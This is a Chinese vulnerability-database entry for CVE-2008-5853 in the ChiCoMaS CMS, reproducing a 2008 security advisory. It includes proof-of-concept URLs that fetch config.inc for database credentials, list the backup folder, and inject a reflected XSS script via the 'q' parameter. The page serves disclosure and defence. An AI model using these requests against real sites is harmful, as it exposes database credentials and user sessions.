chicomas 权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117101 漏洞类型 权限许可和访问控制
发布时间 2008-12-21 更新时间 2009-01-06
CVE编号 CVE-2008-5853 CNNVD-ID CNNVD-200901-042
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7532
https://www.securityfocus.com/bid/84642
https://cxsecurity.com/issue/WLB-2009010128
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-042
|漏洞详情
ChilekContentManagementSystem(又称ChiCoMaS)是一款内容管理系统。ChilekContentManagementSystem(又称ChiCoMaS)2.0.4以及之前的版本在web根下储存敏感信息而未赋予足够的访问控制,这使得远程攻击者可以(1)借助一个对config.inc的直接请求,获得数据库信任证书;或(2)借助一个对backup/URI的直接请求,读取数据库文件备份。
|漏洞EXP
########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title:  chicomas <=2.0.4 Multiple Vulnerabilities
# Vendor: http://www.chicomas.com/
# Demo:   http://demo.opensourcecms.com/chicomas
# Bug:    Database Information Disclosure, Authorization Weakness, XSS
# Vulnerable Version: 2.0.4
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_59.htm
###################################################################


####################
- Description:
####################

  ChiCoMaS is free web based Content Management System based on PHP & MySQL with Full featured WYSIWYG TinyMCE editor,
File management with QuiXplorer, User and group administration to manage access permissions & Backup/Restore with integrated MySqlBackupPro.

####################
- Vulnerability:
####################

+-->Dtabase Information Disclosure

POC: http://[URL]/chicomas/config.inc


+-->The Latest generated Database backups

POC: http://[URL]/chicomas/backup


+-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q" parameter.

POC: http://[URL]/chicomas/index.php?q="<script>alert(/www.BugReport.ir/.source)</script>

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources. Edit the source code to ensure that inputs are properly sanitized.

####################
- Credit :
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com

# milw0rm.com [2008-12-21]
|受影响的产品
ChiCoMaS ChiCoMas 2.0.4 ChiCoMaS ChiCoMas 2.0.3
|参考资料

来源:BUGTRAQ
名称:20081220chicomas<=2.0.4MultipleVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/499458/100/0/threaded
来源:MILW0RM
名称:7532
链接:http://www.milw0rm.com/exploits/7532
来源:MISC
链接:http://www.bugreport.ir/index_59.htm
来源:SREASON
名称:4872
链接:http://securityreason.com/securityalert/4872
来源:SECUNIA
名称:30080
链接:http://secunia.com/advisories/30080